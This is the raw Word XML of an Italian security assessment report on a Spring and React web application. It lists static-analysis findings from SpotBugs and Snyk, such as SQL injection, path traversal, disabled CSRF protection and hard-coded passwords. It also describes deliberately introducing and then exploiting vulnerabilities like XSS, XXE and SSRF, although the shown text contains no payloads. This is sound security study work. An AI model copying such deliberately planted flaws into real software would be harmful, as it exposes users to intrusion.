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npm</w:t>
      </w:r>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NodeJs</w:t>
      </w:r>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compose</w:t>
      </w:r>
      <w:r w:rsidRPr="009036AA">
        <w:rPr>
          <w:rFonts w:cs="Noto Sans"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> v1.29.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F223BE" w14:textId="671085B9" w:rsidR="005E4254" w:rsidRDefault="005E4254" w:rsidP="003961B0">
      <w:r>
        <w:t xml:space="preserve">L’applicazione è stata testata tramite il browser </w:t>
      </w:r>
      <w:r w:rsidRPr="00524F81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mozilla Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>, facendo uso degli strumenti per sviluppatori. In particolare, è stata usata la sezione Network del Web Developer Tool dove è stato poss</w:t>
      </w:r>
      <w:r w:rsidR="00B707B2">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>bile analizzare tutte le richieste scambiate. Alcune di esse sono state usate per fare gli exploit degli attacchi, andando a modificare i parametri o il body inviati nella richiesta usando l’opzione Edi</w:t>
      </w:r>
      <w:r w:rsidR="00B707B2">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e Resend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689355EE" w14:textId="46CD3189"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original</w:t>
      </w:r>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original_patched</w:t>
      </w:r>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new_vulnerabilities</w:t>
      </w:r>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new_vulnerabilities_patched</w:t>
      </w:r>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2FE97076" w:rsidR="009036AA" w:rsidRDefault="009036AA" w:rsidP="00792C82">
      <w:r>
        <w:t xml:space="preserve">Per analizzare le vulnerabilità del back-end è stato usato </w:t>
      </w:r>
      <w:r w:rsidRPr="006A2C81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SpotBugs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00073656" w:rsidRPr="00073656">
        <w:t>v.</w:t>
      </w:r>
      <w:r w:rsidR="00073656" w:rsidRPr="00073656">
        <w:rPr>
          <w:rFonts w:cs="Noto Sans"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.1.5</w:t>
      </w:r>
      <w:r w:rsidR="00073656">
        <w:rPr>
          <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con l’estensione FindSecBugs mentre per il front-end è stato usato </w:t>
      </w:r>
      <w:r w:rsidRPr="006A2C81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Snyk</w:t>
      </w:r>
      <w:r w:rsidR="00073656">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00073656" w:rsidRPr="00073656">
        <w:t>v.</w:t>
      </w:r>
      <w:r w:rsidR="00073656" w:rsidRPr="00073656">
        <w:rPr>
          <w:rFonts w:cs="Noto Sans"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.1291.1</w:t>
      </w:r>
      <w:r w:rsidR="003022AA">
        <w:t xml:space="preserve">. Entrambi i tool sono dei plugin di Eclipse. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0789566E" w14:textId="03A715C3" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00792C82">
      <w:r>
        <w:t xml:space="preserve">Per SpotBugs bisogna andare in Window -&gt; Preferences -&gt; Java -&gt; SpotBugs e selezionare solo l’opzione Security. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76481A18" w14:textId="77777777" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00792C82"/>
    <w:p w14:paraId="163D0BE7" w14:textId="3B4751AC" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00792C82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251915264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="698EBCCD" wp14:editId="26D78C5D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-420370</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6035040" cy="3054773"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="162347185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200" b="44915"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6035040" cy="305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99A1" w14:textId="714D787A" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00792C82"/>
    <w:p w14:paraId="50F0B667" w14:textId="326DD9BF" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00792C82"/>
    <w:p w14:paraId="34A43FBE" w14:textId="4D6D742C" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00792C82"/>
    <w:p w14:paraId="3531014F" w14:textId="4575821E" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00792C82"/>
    <w:p w14:paraId="4D61D973" w14:textId="4C03BD1D" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00792C82"/>
    <w:p w14:paraId="553DBE48" w14:textId="1505FD8E" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00792C82"/>
    <w:p w14:paraId="3A42873B" w14:textId="1F04DF38" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00792C82"/>
    <w:p w14:paraId="3ECC7F1C" w14:textId="2C685536" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00792C82"/>
    <w:p w14:paraId="545A865D" w14:textId="1716288C" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00073656">
      <w:r>
        <w:t>Per installare Snyk code: npm install -g snyk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE18E54" w14:textId="661EFF10" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00073656">
      <w:r>
        <w:t>Poi posizionarsi nella cartella react-front end ed avviare il test con il seguente comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032DE2B0" w14:textId="245EFDAD" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00073656">
      <w:r>
        <w:t>snyk code test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F018FB6" w14:textId="638ED232" w:rsidR="00073656" w:rsidRDefault="00793624" w:rsidP="00792C82">
      <w:r>
        <w:t xml:space="preserve">Nota: </w:t>
      </w:r>
      <w:r w:rsidRPr="00793624">
        <w:t xml:space="preserve">Per </w:t>
      </w:r>
      <w:r>
        <w:t>eseguire</w:t>
      </w:r>
      <w:r w:rsidRPr="00793624">
        <w:t xml:space="preserve"> Snyk su </w:t>
      </w:r>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00793624">
        <w:t>indows assicurarsi di aver abilitato l'esecuzione di script PowerShell</w:t>
      </w:r>
      <w:r>
        <w:t>. P</w:t>
      </w:r>
      <w:r w:rsidRPr="00793624">
        <w:t>er abilitarla aprire PowerShell come amministratore e digitare: "Set-ExecutionPolicy RemoteSigned" mettendo "y" a tutte le richieste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB7C0D4" w14:textId="7D2B1F98" w:rsidR="00073656" w:rsidRDefault="00793624" w:rsidP="00792C82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251916288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5EB776DA" wp14:editId="7A680E3D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>160020</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5900847" cy="1329097"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:wrapNone/>
            <wp:docPr id="16433019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47" cy="1329097"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CE3E5E" w14:textId="25151AE3" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00792C82"/>
    <w:p w14:paraId="6359F6BA" w14:textId="38E9D207" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00792C82"/>
    <w:p w14:paraId="7B3C01B3" w14:textId="77777777" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00792C82"/>
    <w:p w14:paraId="302EF3CE" w14:textId="77777777" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00792C82"/>
    <w:p w14:paraId="3480A6CA" w14:textId="77777777" w:rsidR="00073656" w:rsidRDefault="00073656" w:rsidP="00792C82"/>
    <w:p w14:paraId="5DA21638" w14:textId="69C5884F" w:rsidR="00844BCD" w:rsidRDefault="00844BCD" w:rsidP="00792C82">
      <w:r>
        <w:t>L’analisi del front-end non ha riportato alcuna vulnerabilità.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA2F772" w14:textId="6A433060" w:rsidR="00844BCD" w:rsidRDefault="00844BCD" w:rsidP="00792C82">
      <w:r>
        <w:t xml:space="preserve">L’analisi del back-end </w:t>
      </w:r>
      <w:r w:rsidR="00851F35">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00851F35" w:rsidRPr="006A2C81">
        <w:rPr>
          <w:rFonts w:cs="Noto Sans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>App_original</w:t>
      </w:r>
      <w:r w:rsidR="00851F35" w:rsidRPr="006A2C81">
        <w:rPr>
          <w:rFonts w:cs="Noto Sans"/>
          <w:color w:val="000000"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ha riportato 15 </w:t>
      </w:r>
      <w:r w:rsidR="00C53044">
        <w:t xml:space="preserve">potenziali </w:t>
      </w:r>
      <w:r>
        <w:t>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67028BC6" w:rsidR="001A56AB" w:rsidRPr="00C56823" w:rsidRDefault="001A56AB" w:rsidP="00C56823">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Spring CSRF protection disabled</w:t>
            </w:r>
            <w:r w:rsidR="00C53044">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Cross-Site Request Forgery)</w:t>
            </w:r>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r w:rsidRPr="00C56823">
              <w:rPr>
                <w:rFonts w:cs="Noto Sans"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Disabling Spring Security's CSRF protection is unsafe for standard web applications</w:t>
            </w:r>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Mass Assignment</w:t>
            </w:r>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persistent objects could be exploited by </w:t>
            </w:r>
            <w:r w:rsidRPr="00C56823">
              <w:rPr>
                <w:rFonts w:cs="Noto Sans"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>attacker to read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Hard coded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Hard coded password found</w:t>
            </w:r>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r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Unexpected property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r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Unexpected property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r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Unexpected property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r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Unexpected property leakage 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FAB0D87" w14:textId="1390AD1F" w:rsidR="001A56AB" w:rsidRPr="00C56823" w:rsidRDefault="00E24530" w:rsidP="00E24530">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
            <w:r w:rsidR="001A56AB" w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserv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r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Unexpected property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r w:rsidRPr="00C56823">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Predictable pseudo-random number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r w:rsidRPr="00C56823">
              <w:rPr>
                <w:rFonts w:cs="Noto Sans"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>This random generator (java.util.Random) is predictable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="467D961D" w14:textId="77777777" w:rsidR="00844BCD" w:rsidRDefault="00844BCD" w:rsidP="00792C82"/>
    <w:p w14:paraId="4E38EF26" w14:textId="3585435B" w:rsidR="00844BCD" w:rsidRDefault="00844BCD" w:rsidP="00792C82">
      <w:r>
        <w:t xml:space="preserve">Per i true positive viene mostrato l’exploit insieme al fix della vulnerabilità mentre per </w:t>
      </w:r>
      <w:r w:rsidR="003961B0">
        <w:t>le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> false positive è stato spiegato </w:t>
      </w:r>
      <w:r w:rsidR="00C53044">
        <w:t xml:space="preserve">nella prossima sezione </w:t>
      </w:r>
      <w:r>
        <w:t>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nelle web application e sono le seguenti: SQL Injection, Cross-site Scripting (XSS Stored), Path Traversal, Malicious Code Injection, XML External Entities (XXE), Insecure Deserialization, Server-side Request Forgery (SSRF), Regex DOS, Insecure Direct Object References (IDOR), Unvalidated Redirect, Performing string modification after validation. Di ognuna di queste vulnerabilità è stato fatto l’exploit, fornendo il payload utilizzato e successivamente il fix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287340D4" w14:textId="350393FD" w:rsidR="00F36B9B" w:rsidRDefault="00F36B9B" w:rsidP="00792C82">
      <w:r>
        <w:t xml:space="preserve">Dopo l’introduzione delle nuove vulnerabilità, è stata eseguita nuovamente l’analisi statica </w:t>
      </w:r>
      <w:r w:rsidR="00FD7204">
        <w:t xml:space="preserve">sia </w:t>
      </w:r>
      <w:r>
        <w:t>con SpotBugs</w:t>
      </w:r>
      <w:r w:rsidR="004C5F9A">
        <w:t xml:space="preserve"> che </w:t>
      </w:r>
      <w:r w:rsidR="00FD7204">
        <w:t xml:space="preserve">con Snyk. SpotBugs </w:t>
      </w:r>
      <w:r w:rsidR="004C5F9A">
        <w:t>ha rilevato un sottoinsieme delle vulnerabilità introdotte. Alcune di esse infatti non sono visibili dal tool poiché le classifica come false negative. Di seguito sono riportate le vulnerabilità rilevate</w:t>
      </w:r>
      <w:r w:rsidR="00FD7204">
        <w:t xml:space="preserve"> da SpotBugs</w:t>
      </w:r>
      <w:r w:rsidR="004C5F9A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5DD04A" w14:textId="77777777" w:rsidR="004C5F9A" w:rsidRDefault="004C5F9A" w:rsidP="00792C82"/>
    <w:p w14:paraId="1F028246" w14:textId="77777777" w:rsidR="004C5F9A" w:rsidRDefault="004C5F9A" w:rsidP="00792C82"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>
        <w:tblW w:w="10955" w:type="dxa"/>
        <w:tblInd w:w="-574" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1889"/>
        <w:gridCol w:w="1141"/>
        <w:gridCol w:w="2604"/>
        <w:gridCol w:w="661"/>
        <w:gridCol w:w="4660"/>
      </w:tblGrid>
      <w:tr w:rsidR="005422F3" w14:paraId="29805BE1" w14:textId="77777777" w:rsidTr="005422F3">
        <w:trPr>
          <w:trHeight w:val="390"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D50260A" w14:textId="7AC55D17" w:rsidR="004C5F9A" w:rsidRDefault="004C5F9A" w:rsidP="004C5F9A">
            <w:r w:rsidRPr="00C56823">
              <w:lastRenderedPageBreak/>
              <w:t>Nome</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1141" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66D02419" w14:textId="009145AD" w:rsidR="004C5F9A" w:rsidRDefault="004C5F9A" w:rsidP="004C5F9A">
            <w:r w:rsidRPr="00C56823">
              <w:t>Risultato</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2604" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A05C473" w14:textId="602ABD4F" w:rsidR="004C5F9A" w:rsidRDefault="004C5F9A" w:rsidP="004C5F9A">
            <w:r w:rsidRPr="00C56823">
              <w:t>File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A4E42CD" w14:textId="62AD7A22" w:rsidR="004C5F9A" w:rsidRDefault="004C5F9A" w:rsidP="004C5F9A">
            <w:r w:rsidRPr="00C56823">
              <w:t>Riga</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17656FD7" w14:textId="34334803" w:rsidR="004C5F9A" w:rsidRDefault="004C5F9A" w:rsidP="004C5F9A">
            <w:r w:rsidRPr="00C56823">
              <w:t>Descrizione</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005422F3" w14:paraId="5FF5E189" w14:textId="77777777" w:rsidTr="005422F3">
        <w:trPr>
          <w:trHeight w:val="3989"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="591A32CC" w14:textId="20D8AAEA" w:rsidR="004C5F9A" w:rsidRPr="00C56823" w:rsidRDefault="004C5F9A" w:rsidP="004C5F9A">
            <w:bookmarkStart w:id="0" w:name="_Hlk169013323"/>
            <w:r>
              <w:t xml:space="preserve">Potential JDBC Injection </w:t>
            </w:r>
            <w:r w:rsidR="005422F3">
              <w:t xml:space="preserve">/ </w:t>
            </w:r>
            <w:r w:rsidR="005422F3" w:rsidRPr="005422F3">
              <w:t xml:space="preserve">Nonconstant string passed to execute or addBatch method on an SQL statement </w:t>
            </w:r>
            <w:r>
              <w:t>(SQL Injection)</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1141" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D1BA7B4" w14:textId="01B7DEC6" w:rsidR="004C5F9A" w:rsidRPr="00C56823" w:rsidRDefault="004C5F9A" w:rsidP="004C5F9A">
            <w:r>
              <w:t>True positive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2604" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08FD9E4D" w14:textId="7E222D35" w:rsidR="004C5F9A" w:rsidRPr="00C56823" w:rsidRDefault="004C5F9A" w:rsidP="004C5F9A">
            <w:r>
              <w:t>UserController.java</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04AEB7C2" w14:textId="6D5A92C9" w:rsidR="004C5F9A" w:rsidRPr="00C56823" w:rsidRDefault="004C5F9A" w:rsidP="004C5F9A">
            <w:r>
              <w:t>298</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03D73E4B" w14:textId="77777777" w:rsidR="005422F3" w:rsidRDefault="004C5F9A" w:rsidP="004C5F9A">
            <w:pPr>
              <w:pStyle w:val="messagelistitem050f9"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C5F9A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>This use of java/sql/Statement.executeQuery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02F21D65" w14:textId="77777777" w:rsidR="004C5F9A" w:rsidRDefault="004C5F9A" w:rsidP="004C5F9A">
            <w:pPr>
              <w:pStyle w:val="messagelistitem050f9"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004C5F9A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>(Ljava/lang/String;)</w:t>
            </w:r>
            <w:r w:rsidR="005422F3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004C5F9A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Ljava/sql/ResultSet; can be vulnerable to SQL injection (with JDBC) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4625A0F0" w14:textId="77777777" w:rsidR="005422F3" w:rsidRDefault="005422F3" w:rsidP="004C5F9A">
            <w:pPr>
              <w:pStyle w:val="messagelistitem050f9"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="198262BE" w14:textId="77777777" w:rsidR="005422F3" w:rsidRDefault="005422F3" w:rsidP="004C5F9A">
            <w:pPr>
              <w:pStyle w:val="messagelistitem050f9"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005422F3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>backend.hobbiebackend.web.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DCC4167" w14:textId="00528BC6" w:rsidR="005422F3" w:rsidRPr="004C5F9A" w:rsidRDefault="005422F3" w:rsidP="004C5F9A">
            <w:pPr>
              <w:pStyle w:val="messagelistitem050f9"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005422F3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>UserController.authenticate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005422F3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>(JwtRequest) passes a nonconstant String to an execute or addBatch method on an SQL statement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005422F3" w14:paraId="3783D554" w14:textId="77777777" w:rsidTr="005422F3">
        <w:trPr>
          <w:trHeight w:val="1394"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A011082" w14:textId="11BB650D" w:rsidR="005422F3" w:rsidRDefault="005422F3" w:rsidP="004C5F9A">
            <w:r w:rsidRPr="005422F3">
              <w:t>Potential Path Traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1141" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05E3042D" w14:textId="6165E2A6" w:rsidR="005422F3" w:rsidRDefault="005422F3" w:rsidP="004C5F9A">
            <w:r>
              <w:t>True positive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2604" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7123E79E" w14:textId="1A0A7401" w:rsidR="005422F3" w:rsidRDefault="005422F3" w:rsidP="004C5F9A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>UserController.java</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09799E39" w14:textId="4E0BCF19" w:rsidR="005422F3" w:rsidRDefault="005422F3" w:rsidP="004C5F9A">
            <w:r>
              <w:t>178</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19B7B412" w14:textId="18B0D6B5" w:rsidR="005422F3" w:rsidRPr="004C5F9A" w:rsidRDefault="005422F3" w:rsidP="004C5F9A">
            <w:pPr>
              <w:pStyle w:val="messagelistitem050f9"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans"/>
